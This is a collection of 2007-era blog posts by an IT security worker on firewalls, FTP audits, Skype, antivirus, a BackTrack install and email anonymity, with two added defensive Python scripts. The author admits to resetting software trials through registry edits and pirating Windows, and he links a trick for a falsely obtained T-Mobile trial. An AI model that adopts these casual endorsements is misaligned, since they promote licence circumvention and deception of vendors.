Another analyst that I have grown to like, mostly because of his style of posting bullet points and getting all his stuff in one post as much as his incites (sic), is Mike Rothman. I may not always agree and I may find his stuff not relevant to my roles, but he has gems. He had one today where he said, "Everyone needs a plan, but those that spend all day planning, spend very little time doing. So plan quick, do stuff, adapt and repeat." We can sit and talk about how to get the perfect security plan and plan, plan, plan so that we're not the next headline in the paper. But we could end up doing that for ten years...and get nowhere. Just do it. Get an idea or something to do and do it. It might be only part of the solution, it might even be wrong, but just do it. Evaluate it. Fix it. Adapt. Improve. But bottom line, do something! A company that really wants to support its IT and security personnel will be willing to allow some levity in getting things done and making mistakes here and there. If the company is not, they either won't ever have security, have scared admins who end up doing nothing but the barest bottom line, or they have a team of perfect Jesus Admins working for them.

Laptop encryption is a big deal these days. But one must always keep in mind that the best way to keep sensitive information safe is to not have it on insecure devices and to physically destroy media when no longer used. Encryption, if you want to get really technical, is just obfuscation. It cannot realistically be broken today...but the key word there is "today." If that drive is important enough, an attacker can keep hold of it for years and continuously work against it. Encryption is a huge step up from bare data, but it is still not a complete substitute for sound information storage and usage practices. Either way, full-disk encryption will soon become standard on every hard drive, and users can turn it off if they want on the hardware. Kinda like providing a lock and key on a computer case. If you want to take the trouble to supply the key each time you want in, go for it, otherwise just don't lock it.

.: ramble on predictions just a bit: outsource vs complexity
A post by Adam Dodge about a couple of University of Arizona departmental web servers being defaced reminded me of a sort of 5-year-ish prediction I have in my head now and then. These webservers were running Twiki, and a vulnerability in that program, apparently already known to the admins, led to the defacement.

In my last job we were an ASP (application service provider, i.e. we hosted a web-delivered service) and about 150 employees. About 1/3 of the company was comprised of IT and development staff. The number of applications we, the infrastructure (network, security, sysadmin, etc) team, supported was not terribly high, maybe about 2-3 dozen different types of systems we needed to stay abreast of or at least keep secure. That's still a lot of work to be on top of patching and securing and managing those applications properly. And it really sucked to have surprise applications (one was a wiki hosted on a developer laptop that suddenly became a burden to his system performance [gee, ya think?] and a critical piece of their own processes [ugh, thanks]) pop up in the environment.

My prediction is corporate applications will do one of three things:

1) Security will move to the network and we won't necessarily give a crap about what goes on a system. Thin-client computing is being talked about again... If people want to run an application for their department that is buggy and 7 years old and barely supported anymore, go ahead in your own little secured network area.

2) Security and IT management will win out and corporate applications will consolidate and diminish. Rather than trying out everything under the sun and small pockets of people relying on a disparate number of applications, corporations will get rid of a lot of them and just use the really important ones. Providers that can provide a full solution will benefit. For instance, Salesforce.com provides sales with almost everything they need except corporate email and phones. That's awesome and leaves sales really not wanting for much else other than mobile devices and access to information when they need it, anywhere.

3) We're just plain screwed and the security function of managing all those disparate applications will be a regular task for IT/security.

This flies in the face of what I really think is coming: outsourced security. You can audit, evaluate, test, assess, monitor, and manage alerts from an outsourced entity, but how can an outside entity ever truly understand all those little apps that pop up in every corporate environment? How much clout would such an outsourced team have when saying an HR tool is outdated and should be removed as a liability and administrative drain on resources? How intimate can they REALLY get? (Answer: only as intimate as the tools let them...and they don't get that intimate...)

I guess I can mix this all around and say a prediction will be the grinding of these two gears that don't quite fit with each other: outsourcing security and day-to-day IT tasks vs. the disparate and complex and everchanging digital landscape of the corporate campus.
.: a negative illustration allows the rest of us to learn
Sometimes a blog post comment can be just as good as the blog post that inspired it. A comment on a post by Richard Bejtlich is an excellent real-world example of changes that occur in an environment and what can happen if everything is managed separately. I've seen something similar to this before, where a pix static NAT rule was put into place (by accident I hope; we never did answer this question because the tech who made the mistake had left a few months before the discovery) that basically left the balls of 2 servers out on the Internet for the wind to tickle. Eventually they fell victim to worm activity, but thankfully the damage was limited to just those two old dev servers. NSM did not lead me to the answer (we didn't practice that); rather a lucky port scan from the outside, conducted on a gut feeling, revealed the issue.

I enjoy reading what breaks or didn't work in environments. Too often such stories are so cloaked in corporate secrecy that we don't get the opportunity to learn. How often are firewalls managed in a way that if a system is taken down and another put in its place, the firewall mappings will be reviewed and updated as well? How much chaos in a network can an IT team handle before problems like this arise? How much should policy mandate what happens and what does not happen? Or should it come down to invoked policies or, better yet, an inventory of systems and configs?
.: paying for software
At the risk of painting a hat on my head, I have to make a small rant about paying for software.

I have had two fairly "small" tasks at my job in the last 8 months (no, not the only tasks, these are just two I'm pulling out). The first was to audit and "fix" file server permissions on a Windows file server utilizing AD accounts. The second was to be able to enumerate which Exchange mailboxes a user has rights to. Our company allows two levels of managers above an employee to have full access to the employee's mailbox. To anyone who has done either task, what sounds simple is really not all that simple at all.

For the first one, sure you can dump a huge ACL list. But can you answer the question, "What does Joe Blow have access to?" Unless you have a strict policy on user rights management using AD groups, this is much harder to answer. I really enjoy using ScriptLogic's Enterprise Security Reporter. While I don't use this tool nearly to its full value, I do really enjoy the ability to audit a file server and dump reports on permission levels. Would I pay for this tool? I don't know, but until I can, I just creatively use regmon and registry editing to avoid the trial expirations.

For my Exchange rights issue, I found Vyapin's Active Report Kit for Exchange Server. This tool will let me pull out information from AD/Exchange and lets me answer my question, even with the export/print-limited trial. My main question was similar to the file server one: "Whose mailboxes does John Foo have access to?" (On a side note, the supposedly limited exporting seemed to send the tool into an endless loop and built up a 2.0GB excel file before I finally decided enough.)

In the end, I really hate paying for tools to do things I really should learn how to do myself, manually, someday. Windows scripting has long been on my list of things to learn, but quite often is nearer the bottom of the list than the top. Someday I will get this down, and then I can answer my own questions and needs rather than looking for expensive software to do them for me. There really are not enough hours in my day...
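For the file server question above ("What does Joe Blow have access to?"), here is an added example of the kind of script that answers it without a commercial reporter. This is my own illustration, not code from the post or from ScriptLogic's product, and it runs on two constructed inputs: an icacls-style export (one path per block, one identity:(flags)(rights) entry per line; paths in the sample contain no spaces) and a group membership map of the sort you would pull out of AD. The work it does that a raw ACL dump does not is expanding nested group membership and letting DENY entries subtract from ALLOW entries.

```python
"""Answer "what does this user have access to?" from a file-server ACL dump.

Added example, not from the original post or from any product it mentions.
Inputs are constructed: an icacls-style export and a group membership map.
Assumption: paths contain no spaces; identities (DOMAIN\\name) may.
"""
import re
from collections import defaultdict

# Constructed sample in the shape `icacls D:\Shares /t` prints.
SAMPLE_ICACLS = """\
D:\\Shares\\Finance CORP\\Finance-RW:(OI)(CI)(M)
                   CORP\\Domain Admins:(OI)(CI)(F)
D:\\Shares\\HR CORP\\HR-Staff:(OI)(CI)(M)
              CORP\\jblow:(OI)(CI)(R)
              CORP\\Domain Admins:(OI)(CI)(F)
D:\\Shares\\Public CORP\\Domain Users:(OI)(CI)(M)
                   CORP\\Finance-RW:(DENY)(OI)(CI)(W)
"""

# Constructed group membership (group -> direct members); nesting is allowed.
GROUP_MEMBERS = {
    "CORP\\Finance-RW": ["CORP\\Finance-Leads"],
    "CORP\\Finance-Leads": ["CORP\\jblow"],
    "CORP\\Domain Users": ["CORP\\jblow", "CORP\\asmith"],
    "CORP\\HR-Staff": ["CORP\\asmith"],
    "CORP\\Domain Admins": ["CORP\\admin1"],
}

# Simple rights expanded to primitives, so a DENY on one primitive can be
# subtracted from an ALLOW of a broader right.
RIGHTS = {
    "F": {"read", "write", "execute", "delete", "change_perms"},
    "M": {"read", "write", "execute", "delete"},
    "RX": {"read", "execute"},
    "R": {"read"},
    "W": {"write"},
}

LINE_RE = re.compile(
    r"^(?:(?P<path>[A-Za-z]:\\\S*)\s+)?(?P<id>[^:]+):(?P<aces>(?:\([^)]*\))+)\s*$"
)


def parse_icacls(text):
    """Return [(path, identity, is_deny, primitive_rights)] for every ACE."""
    entries, path = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("unrecognised icacls line: %r" % line)
        if m.group("path"):
            path = m.group("path")          # new block: the path is on this line
        tokens = [t for grp in re.findall(r"\(([^)]*)\)", m.group("aces"))
                  for t in grp.split(",")]
        prims = set()
        for t in tokens:
            prims |= RIGHTS.get(t, set())   # (OI)(CI)(I) are inheritance flags, no rights
        entries.append((path, m.group("id").strip().lower(), "DENY" in tokens, prims))
    return entries


def principals_for(user, groups):
    """The user plus every group containing them, directly or through nesting."""
    parents = defaultdict(set)
    for group, members in groups.items():
        for member in members:
            parents[member.lower()].add(group.lower())
    seen, todo = {user.lower()}, [user.lower()]
    while todo:
        for group in parents.get(todo.pop(), ()):
            if group not in seen:
                seen.add(group)
                todo.append(group)
    return seen


def effective_access(user, acl_text, groups):
    """Map path -> effective primitive rights for `user`; deny ACEs win over allows."""
    principals = principals_for(user, groups)
    allowed, denied = defaultdict(set), defaultdict(set)
    for path, ident, is_deny, prims in parse_icacls(acl_text):
        if ident in principals:
            (denied if is_deny else allowed)[path] |= prims
    result = {}
    for path in allowed:
        rights = allowed[path] - denied[path]
        if rights:
            result[path] = rights
    return result


if __name__ == "__main__":
    for user in ("CORP\\jblow", "CORP\\asmith"):
        print(user)
        for path, rights in sorted(effective_access(user, SAMPLE_ICACLS, GROUP_MEMBERS).items()):
            print("  %-20s %s" % (path, ", ".join(sorted(rights))))
```

Run it and jblow shows up with modify on Finance (through the nested Finance-Leads group), read-only on HR, and modify-minus-write on Public because of the DENY on Finance-RW. It ignores share-level permissions and the finer NTFS special rights, which is exactly the sort of gap the commercial reporters fill.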
.: more on paying for software
I need to continue my post below before some evangelists in the security world judge me blindly. :)

I love Windows. Really, I do. Well, ok...I did love Windows. I loved Windows until they started doing that Genuine Advantage Crap. Suddenly half my test machines could no longer be reinstalled and wouldn't get some updates. Microsoft is the biggest single reason I moved to Linux last year. Go figure.

Now, one of the reasons I use and have used Windows so much would be twofold: 1) It comes with new computers and has come with all computers I've bought (i.e. no perceived cost since I couldn't easily avoid it). 2) I could pirate it and use it on my old and spare machines without necessarily paying for it. I would never condone this in a workplace, however, just for home personal use.

Lots of expensive software is out on the market with limited trials and big price tags that talk about things in terms of installation instances or numbers of managed devices. I hate that. I hate having the limitations (subconscious and real) of really cool software. And if I can't use it at home and become intimately familiar and happy with it, why would I ever request my company spend money on it? Something would have to be drop-dead and immediately awesome to get that sort of request pushed through.

I wish more cool software was free to home users so that us geeks can become familiar with them and get them legitimately into the workplace.

Likewise, I have no clue how companies that sell an appliance to do certain things can really expect to get good market penetration without a lot of hard in-your-face sales work, and being able to get IT shops with time to spare to check out the appliance features. I'd much rather be able to get an appliance, even a stripped-down barebones POS running the software at home so that I can get really happy with it. A one-month trial is just lame for most of us already busy geeks, especially when such devices keep wanting to do everything and it takes 3 years just to realize how crappy it was underneath the surface.

Give me free junk to play with that works well, and I'll speak highly of it to people I know, or my own company.

Ok, enough ranting on this topic. I had to get it out sometime!
.: dns and bind information
This isn't on my horizon yet, but someday I will do a BIND DNS server at home, if not sooner at work. Yanked from ISC, NIST has a standards doc (pdf) and there is also a secured BIND configuration and information available as well.
.: chuck norris uses a live python as a...wait...maybe not
Along with Windows scripting, I do want to sooner get back into programming. Right now, I just kinda need a reason to put programming into practice. I can hack around with Perl and other languages just fine, and have had experience in others like VB and C. But someday when I get really down into learning one of them again, I'll likely go the route of Python. Nicely enough, cdman just today posted about a couple freebie Python books to help out. Dive Into Python and Learning With Python.

Will I get into this this year? Honestly, I'd like to, but I'm not sure if I will have the time until late this year. I do have other plans, and I really hate overbooking my goals in a year. Thankfully, Perl has been around a long time and I suspect Python will also be as useful for that long or longer.
.: daylight savings change
ISC posted good info about the Daylight Savings change, which I won't regurgitate, but I will repost some links. While I never joined in with the fear of the Y2K switch, I really think this DST change will be more problematic than anticipated (anticipation is so high no one is talking about it!).

Aha! I still run Windows 2000 Pro instances so I have to follow special steps (also KB914387 and KB928388). Why do I run 2000? Good question. First, the specs on some systems, mostly older laptops and 500MHz machines, are not good enough to run XP without lots of cursing. Second, I don't have things like XP's Genuine Advantage squawking at me and then disabling my install after 30 days. Screw that.
.: email boxes
One thing I have learned in my short time in IT is email boxes are not really a valid storage area, especially for those of us in the infrastructure side of IT. Since I switched jobs last year, I was able to start out with a fresh email box at the new company. I was able to put into action what I had learned late in my last job about not bothering with keeping a huge email store. One of my favorite managers at my last job had almost a zero-sized mail store because of this approach, and I agree with it. There's little reason in saving everything, especially from a business standpoint in my role. Emails:

1) Get read and deleted.
2) Get read and acted upon.
3) Get read and saved out of band, for instance on a backed up file server folder structure. (e.g. licensing codes, personally important stuff...)
4) Get read and then printed out and deleted. They then go into my "desk queue" which goes through the same process as I don't let things linger on my desk either. (Of note, with dual-monitors, I print out less...think about that in your next debate discussion on dual-monitor adoption...)

I do keep a certain amount of monitoring email alerts from my company's monitoring systems just so I can do quick trend analysis by eyeballing the alerts. Those usually are small and I purge huge chunks of them every so often so that I only have a few months' worth.

Sometimes emails build up waiting to be read, but I work hard on keeping the level manageable and regularly purged if need be. The only real emails I keep around are sometimes informational or pending projects that can be done down the road. It sucks to get behind with keeping the mailbox cleaned up, and 99% of those emails that slowly build up really do not need to be kept. Besides, I'm cognizant of storage needs in an organization, and much like reducing my waste and power usage at home to do my part to save the environment, so too do I attempt my part in saving storage space.

Does this work for people in all business roles? Nope. Does this work for me at home? Sadly, no. I tend to be the opposite and not delete much of anything other than the complete crap I get. Thankfully, I don't really get all that much email anyway. I even have a zip of emails from 1996-2002 that I started getting when I started college. If nothing else, they are not many, they make for great memory-goads, and can help me get in touch with old buddies sometimes.
.: how many firewalls do I need?
An interesting (and woefully short) question and answer from ComputerWorld, "How many firewalls do I need?"

Answer: "How many can you manage?"

Ok, so that's very simplified and not necessarily the right answer. The thing is, firewalls should be in place on the network any time the trust or sensitivity level of the data or systems changes. If your sales workstations don't need to be up very long and have little sensitive data, but your database server has very sensitive data and needs to be up as much as possible, you really could put a firewall in between the two. If some systems need to be accessed from the Internet but others do not, use a firewall to keep them separate (thus creating your typical DMZ). That way, much like real physical firewalls in cars or buildings, if a "fire" breaks out with an attack against your Internet-accessible servers, the next firewall will contain the "fire" from spreading to those systems that had no business being in the same group as those Internet-accessible ones.

Firewalls are awesome. They create natural choke-points to monitor and measure traffic flow. They allow barriers to access so that you don't have everyone's traffic scurrying around everywhere. They give natural points where traffic capturing and logging can occur (and I've become a big proponent of NSM and logging and traffic analysis).

And put up as many firewalls as you can manage. You can have too many, but the chances of that are far less than not having enough firewalls. Put up as many as you can and remove ones you deem unnecessary or restrictive to network stability later on. But never put up more than you can properly manage. A mismanaged or unmanaged firewall is maybe worse than no firewall at all.

I really believe that firewalls are one of the very few mandatory but not technically necessary pieces of any network (i.e. you CAN run a network without them, but just don't). I consider them a mandatory piece of any network or host-based "defense in depth" approach and one of the most important and valuable (i.e. the value they add) and basic blocks of a network.

My own personal projects list involves learning more firewalls including getting my own home pix someday, becoming more intimately familiar with iptables and pf (if I get into BSD this year), and other standalones like Smoothwall/IPCop and so on.
.: anti-virus is not dead!
I hate hearing things like Anti-Virus is dead or IDS is dead. If they're still being used in corporate and home environments, they are not dead! Now, this paper on greylisting (really, on Bit9 parity), is a noble effort, but as a paper about a "new" method to manage software and malware installation and blocking, the title is sensationalist and unnecessary. In fact, over half the paper is spent trying to convince me that anti-virus is dead. Unfortunately, while you might be able to float me a new product or paradigm, you can't convince me anti-virus is dead (even as I don't typically use any at home because I consider myself slightly educated in technical areas).

Anti-virus is not dead. It might be declining and changing, but it is far from dead. The day my parents remove anti-virus is the week they stumble upon malware on a website or in email, run it, and become infected with something. Thank you, move along, come again.

So I skipped down to greylisting. This is not a hugely novel new approach. In fact, the approach stinks when you turn your head in certain directions and sniff around a bit.

From a corporate or even home family perspective, I like the administrative control and tracking on blacklisting and whitelisting. I also like being able to turn it on and off for laptops that might be offsite. This is defeatable, though, and I'm not sold on it fully. I think many corporations will slowly be moving to thin clients or all laptops (while plenty will of course stay with desktops). Laptops lead to...

...From a user perspective, this is still flawed technology. Just like fake SSLs and firewall block/allow alerts, popups to users will not be understood and will eventually just always be allowed. Game over. The false assertion made in the paper is that the user will try to open a Word doc, see something else wants to start, and realize their error and know better than to continue. No, that's not true. There's even a good chance that I, a security-paranoid freak, would just chalk it up to a bad macro or mis-matched version warnings and click Yes before my brain kicks in and says, "No! You idiot!" The following assertion is also odd in that even if the user clicks it, they only infect themselves and not something else. I don't buy that necessarily, or that that was even an option. If they got hosed and something spewed out copies of itself in emails to their contact list, we can just repeat the user acceptance and nothing has changed.

Ok, end rant, time to go home!
.: the dark underbelly of carding
Wired.com occasionally has stories of such depth and quality that I am amazed I don't regularly read the mag (I did back in the day about 6 years ago, but drifted away). This is one of those stories about the dark underbelly of illegal credit card and identity dealing and investigations into them. Definitely a must read. Part 1 Part 2 Part 2.5 and Part 3 (I don't understand the sequencing, honestly...)
.: sure, I have vista, give me stuff!
I saw this and had to try it, especially since I do enjoy Starbucks, Borders, and I tend to be places where I can see T-Mobile hotspots taunting me. Now, for 3 months, I have a trial account that I can use because T-Mobile thinks I run Vista (nope, I don't). This little hack comes from i-hacked.com.
.: skype is still knocking on the corporate doors
I found a Skype article from CNET posted over at InfoSecPlace and nCircle, and as usual with Skype, I have strong opinions about it. It seems Skype is looking to "partner" with some security companies to provide some additional functionality like "provide add-ons to its software to scan text sent through Skype's chat feature for malicious links."

Ugh. Let's build the frustration just a bit more and quote the article again, "Skype has caused headaches for many IT administrators because it can find ways to make a Net connection despite strong firewall controls on corporate networks."

Ugh, again. First of all, let's get this popular media misconception out of the way. Skype is not my biggest concern because it can find new ways to make a connection to the Internet. Please. If Skype is not a welcome product in a company, this can be circumvented with policy, software/OS restrictions, and even on the network by blocking the sites that Skype initially contacts for logon. Unless they changed in the last year, you couldn't necessarily block authenticated users, but you could easily block the logon process and prevent people from using the system. Not only that, but this is not a "new" headache for admins. Malware has been doing this for a long time...

Second, Skype's problem in the corporate space is not that suspicious links can be sent over the service. Skype's problem is meeting regulations that require Instant Messaging to be logged and/or loggable. And Skype falls into the grey area between phone usage and digital IMing: digital phone calls. I think there is still debate on whether Skype calls need to be monitored as well. Skype needs to deal with that issue before it should spend any more money trying to enter more than just the SOHO corporate space.

Third, Skype has the annoying habit of making outbound connections...everywhere. Anyone who sometimes (or regularly) looks at outbound connections on firewalls for anything suspicious will know that almost every Skype connection seems suspicious. Skype raises the false positive rate so much that it pretty much kills that sort of monitoring. This doesn't kill Skype, but it certainly is a factor in saying no to it in a corporate network.

Fourth, Skype needs to look into making a standalone product. They might be able to have a closed IM solution for a corporation that is not open to the public, and still provide decoding capabilities only to that company. Another widespread corporate requirement is the IM network not being publicly accessible. Again, this won't kill Skype, but is another black mark.

Fifth, Andrew at nCircle mentions, rightly, that it also should be centrally managed and configured. Again, if Skype wants to break into anything beyond SOHO markets, they need to provide management for the staff. This is important enough to be a possible deal-breaker as well.

Skype is awesome at home and for SOHO use. It saves money, is easy to use, provides good security for the mobile crowd (for now, until the encryption is broken or other MITM attacks might arise), and tends to make employees happy; and one of the things I will thump loudly about: happy users means productive users. I hate having to sport an anti-Skype opinion in the corporate space, but the program itself forces me to be able to take either side, passionately, depending on the corporate environment (i.e. HR, senior management, and regulations).
.: ftp audits
IT Audit has an article on 11 steps to an effective FTP audit. I like this article and it gives some good steps to auditing FTP activity; however, I think it misses a few things. While many people are likely already wondering why FTP should be so large-looking a project for such an old and probably under-utilized technology, it is still important, especially if this is a publicly open route into your network. Here are some steps I would add.

A. Audit user accounts and activity - Find out where user accounts are tracked and how expired accounts are handled. Do they linger for years and years without activity? Are client accounts even for active clients anymore? Once this audit is done, keep that list handy so that FTP admins can refer to it later and build upon it so that accounts are removed as needed and existing accounts are tracked. If an account has no activity in 4 years, raise questions on its continued need. I really like the rest of the author's monitoring suggestions. Even if there is seemingly no value in knowing who consistently is the largest transferrer of files, it becomes more important when that consistency is broken one month and some other otherwise quiet account suddenly becomes very active. As part of the account audit, be sure to verify that FTP account access is limited only to their slice of the FTP server, and not overlapping other accounts or able to access other shared spaces. Twenty vendor accounts for 20 vendors that all dump into the same folder is a big risk. Try to also identify shared accounts or those accounts used by just one person, and identify the impact of regularly changing the passwords. Keep in mind that even legitimate users might use the FTP location for malicious reasons such as storing movies or games or other copyrighted property.

B. Recommend granular firewall policies for FTP account access - Whenever possible, require clients, vendors, and FTP users to provide their external IP or IP block to be included in access to the FTP server. It is better to only allow 1,000 IPs access to the FTP server through the firewall than to have all IPs allowed through. It has been my experience that most companies are amenable to providing this information when pressed.

C. Evaluate the patching and security state of the FTP server - Determine the FTP server in use and the version, then research any known vulnerabilities in the server. Recommend patching policy, someone to track patch availability ongoing, and perhaps recommend more secure FTP server solutions. Utilizing an old, insecure version of something like WarFTP or IIS5 should not be very acceptable.

D. Recommend including firewall logs of port 21 access in the audit - It could be beneficial for finding rogue or new FTP servers to include checking firewall logs for successful incoming port 21 occurrences outside the scope of known FTP servers.

FTP servers are still a necessary evil in many corporate environments, and far too many admins put them up, add new users per corporate requests, but otherwise don't consider them with much more interest. As one of likely only a few inroads into your network, FTP servers should be taken as seriously as web and mail servers. The last thing you want to do is find out someone has been using one of your client's accounts to store gigabytes of child pornography over the last 2 years...and be told about it by the client. And even if more secured file transfer options are utilized, such as SFTP or even SSH, most of these guidelines still apply.
.: some goings-on around here: new sites, changed sites, fewer sites
If you're not watching the toolswatch feed from Security-Database, you're missing out on one of the better notification methods for new security tools. I love it!

The folks at nCircle have expanded their blog to more people and this has resulted in lots more posts lately. Good stuff!

It is with much sadness that I am removing a few cherished links from the side. The PacketSniffers were an awesome video cast team from Ohio that posted a series of excellent (albeit more electronics-heavy) video casts back in 2005. Sadly, they have not had any in some time. Seems they have maybe moved on from that endeavor. Also, shortly before LUHRQ was purchased, they started this excellent vidcast called "The Hookup." This was very promising, but never progressed past 4 episodes. I think there is still room in the security sphere for a short show like that, kinda like hak5 and others, only shorter and more focused.

Unfortunately, a work-related demand to cease blogging about technology has caused Securosis to become more personal and less technical. It's a shame, too, since the blog was excellent. For some reason, the latest post doesn't look reflected on the front page...so maybe it is still sorta there. Either way, if it is, I'll re-add it later. Tenable Security's blog, while really cool and interesting, is mostly useless to anyone that does not use their commercial product. If I used that product, this blog is a must-read whenever it is updated. Otherwise, I can just learn by reading and possibly gain insight into Nessus, but the useless content (to me) outweighs the good. I'm also removing Jesper Johansson mostly because, well, I don't read it. And lastly, while I read the updates and the podcast is ok, I really don't care to read Alan Shimel's blog daily anymore. This has been building, but mostly just because I'm not an analyst, I'm in the trenches. And reading what an analyst says really doesn't do me any good at all. Besides, I can follow along on other blogs and get the same effect, or be pointed to his occasional excellent posts from elsewhere. I'll still listen to the podcast now and then, though.

.: is technology costing too much?
I really should have put this in my 2007 predictions, but I guess it might be a prediction that spans a few more years. But this year is going to mark a tough year for IT managers due to the ongoing cost of IT operations. Often, upper management thinks that a project will be planned, budgeted, completed, and then they all move on. Sadly, most IT projects require ongoing maintenance, monthly costs, and people to maintain them. Too many senior managers don't get that, and it is those same senior managers who won't ever "get" security either: you don't achieve it, clap yourself on the back, and stamp it Project Closed.

IT costs a shitload of money over the years, and management is starting to or will start to feel that slow attrition. Security costs a ton and is only going to get bigger as regulations keep edging forward. Windows Vista is out now, which is going to put pressure on companies that pay licensing fees to upgrade, and hardware upgrades to prepare for it. Not only that, but companies with licensing contracts with Microsoft will start to wonder why they spend that money in the first place. Is Vista worth the last 5 years of software assurance? What about SQL licensing? If a company had that assurance contract the last 3 years, you have absolutely nothing to show for it. You want a disaster site and other business continuity plans? You'll be shelling out monthly fees for that. Mobility is needed by the workforce? Good luck not spending money to secure those devices or provide for mobile needs. Also, mobile devices tend to cost more to get the same performance as a desktop machine, and their lifecycle is shorter.

IT is a huge impact on business these days. Not only can I not imagine business without IT (say, 20 years ago), but I can't imagine how we spend so much money on it today. It is no wonder MSSPs and other outsourced IT services providers are feeling the love as businesses get sick of the constant IT drain and start to let others handle it (for better or worse).

This is why I still prefer to focus on the basics in my career. Focus on doing what needs done on the lowest levels. Use the open source and free tools, know how to do things without the fancy and expensive appliances and servers. If you know the basics and low level foo, you'll be able to pick up on the luxury appliances and tools you're allowed to spend money on, just fine when you get them.
.: backtrack install
Backtrack 2 is maybe my favorite livecd, largely due to being security/pen-testing oriented. I have an older laptop which doesn't do so well with 128MB RAM when running a livecd. So, I've permanently installed BackTrack on this laptop (which I'm using for this update right now). Here are my steps (very abbreviated) on doing this. I largely followed this tutorial with minor adjustments.

I had to transplant the HD into another laptop that had enough RAM to properly load the livecd. After that, I booted up into BackTrack and logged in as root. Then:

fdisk /dev/hda (the whole disk device, not /dev/hda1; the partition table lives on the disk, so fdisk is run against hda and the partitions are made inside it)
d (since this is an existing drive, have to delete the first partition first)
1
n (now I want to make new partitions)
p (partition)
1
[enter]
+100M (100M boot partition)
n
p
2
[enter]
+512M (512MB swap)
n
p
3
[enter]
[enter] (will use the rest of the disk for this partition)
a
1
t
2
82 (the code for a Linux Swap)
p (one last print to make sure it all looks good, we can still back out to this point)
w (write!)

Then I went graphical with startx and followed the rest of the steps in the doc. After transplanting the drive back into my older laptop here, I was able to boot into BackTrack quite nicely (and fast compared to cd, even on this old hardware!). From here, I needed to get my wireless going. I started up K->Internet->KWifiManager which then got my Orinoco card going. I then opened a terminal:

iwconfig eth0 essid home key 7027...F9F5 (my wireless network and WEP key)
dhcpcd eth0
ifconfig (to verify I have a proper IP)
ping www.google.com
.: email anonymity notes
I tend to cloak myself in layers of anonymity in my professional online life. Mailing lists are not an exception. In fact, I try my best to participate on mailing lists in a way that does not disclose the company I work for, for various reasons (whether I stick to my other name or move back to LonerVamp, I'm still debating). I see other people do the same, and sometimes they use some wacky (and creative) pseudonyms that harken back to hacker days of old when handles were used more often than real names. They also typically come from email accounts at Gmail, Hotmail, or Yahoo.

To anyone who uses such accounts, be aware that how you use them may determine just how anonymous you remain. Using the webmail interface for each account is pretty secure when it comes to what the mailing list can see. However, if you do your email on a mail client and then POP3/SMTP up to the service, you may be revealing your home IP address in the mail headers. I am not sure if Gmail reveals this information, but I do know Hotmail reveals this. I encourage people to test such functionality well in advance of blindly trusting your security and anonymity.

Or, if the mailing list supports it, submit your replies via a web form. I know SecurityFocus has web-based submissions to its mailing lists if you so prefer. I actually prefer that method.
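As an added example (not from the original post), here is that header check in Python: it parses a message's trace headers, pulls the address out of each Received: line and out of X-Originating-IP where a provider adds one, and reports whether a given address (the one your ISP assigned you) shows up anywhere a list archive could see it. Both sample messages, their hostnames and their addresses are constructed for the example; a real message from your provider will differ in detail but not in structure.

```python
import email
import ipaddress
import re

# Both messages below are constructed for this example, not captured mail.
# MTAs prepend Received: headers, so the first one is the newest hop and the
# last one is whatever handed the message to the provider.

# 1. Sent from a desktop client over authenticated SMTP: the provider's
#    submission server records the client's address, and a header of the
#    kind some webmail providers add repeats it.
SAMPLE_CLIENT = """\
Received: from mail-out.example.net (mail-out.example.net [192.0.2.10])
\tby lists.example.org with ESMTP id 1abc23; Mon, 05 Feb 2007 10:00:02 -0600
Received: from submit.example.net (submit.example.net [192.0.2.20])
\tby mail-out.example.net with ESMTP; Mon, 05 Feb 2007 10:00:01 -0600
Received: from homepc (c-198-51-100-77.isp.example [198.51.100.77])
\tby submit.example.net with ESMTPA; Mon, 05 Feb 2007 10:00:00 -0600
X-Originating-IP: [198.51.100.77]
From: handle@example.net
To: list@example.org
Subject: Re: test

body
"""

# 2. Sent through the provider's web interface: the earliest hop is the
#    provider's own webmail host on private address space.
SAMPLE_WEBMAIL = """\
Received: from mail-out.example.net (mail-out.example.net [192.0.2.10])
\tby lists.example.org with ESMTP id 1abc24; Mon, 05 Feb 2007 10:05:02 -0600
Received: from webmail-03.example.net (webmail-03.internal [10.4.0.3])
\tby mail-out.example.net with ESMTP; Mon, 05 Feb 2007 10:05:01 -0600
From: handle@example.net
To: list@example.org
Subject: Re: test

body
"""

BRACKETED_IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_internal_address(ip):
    """RFC 1918 or loopback space: reveals nothing about where you connect from."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def received_hops(raw):
    """IPv4 addresses from the Received: headers, newest hop first."""
    msg = email.message_from_string(raw)
    hops = []
    for value in msg.get_all("Received", []):
        match = BRACKETED_IPV4.search(value)
        if match:
            hops.append(match.group(1))
    return hops


def originating_ip(raw):
    """Address the provider recorded for the submitting client: X-Originating-IP
    when present, otherwise the earliest Received: hop."""
    msg = email.message_from_string(raw)
    match = BRACKETED_IPV4.search(msg.get("X-Originating-IP", ""))
    if match:
        return match.group(1)
    hops = received_hops(raw)
    return hops[-1] if hops else None


def leaks_address(raw, my_public_ip):
    """The actual check: mail yourself from the account, then see whether the
    address your ISP assigned you appears anywhere in the trace headers."""
    msg = email.message_from_string(raw)
    seen = set(received_hops(raw))
    seen.update(BRACKETED_IPV4.findall(msg.get("X-Originating-IP", "")))
    return my_public_ip in seen


if __name__ == "__main__":
    for label, raw in (("client", SAMPLE_CLIENT), ("webmail", SAMPLE_WEBMAIL)):
        ip = originating_ip(raw)
        print(label, "hops:", received_hops(raw), "origin:", ip,
              "internal:", ip is not None and is_internal_address(ip),
              "leaks 198.51.100.77:", leaks_address(raw, "198.51.100.77"))
```

To use it for real, save a message you sent yourself with full headers (the "show original" or "view source" option in the client or webmail) and pass that text plus your current public address to leaks_address.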
.: home entertainment project, planning stages
I'm just posting quick about a pet project of mine that is still just in the planning stages and likely won't be done until later this year at the earliest. I'd like to develop and complete a more robust home entertainment system than I currently have.

I watch movies. I listen to music (cd and mp3). But I do not watch TV, and thus also do not record shows. In fact, despite owning a plasma TV, I have not watched a television show or had it even set up with television in about 10 months. I do game, although I own none of the latest generation of consoles. I'm looking to buy into that hobby again soon. I don't typically download movies or rip them from existing media, but I am looking into doing that. There are many movies I'd love to have on hand, but wouldn't really ever pay for. Netflix is as far as I would go there, and I wouldn't mind ripping Netflix movies to digital media, or even copying them with a DVD burner (although I have little experience in that).

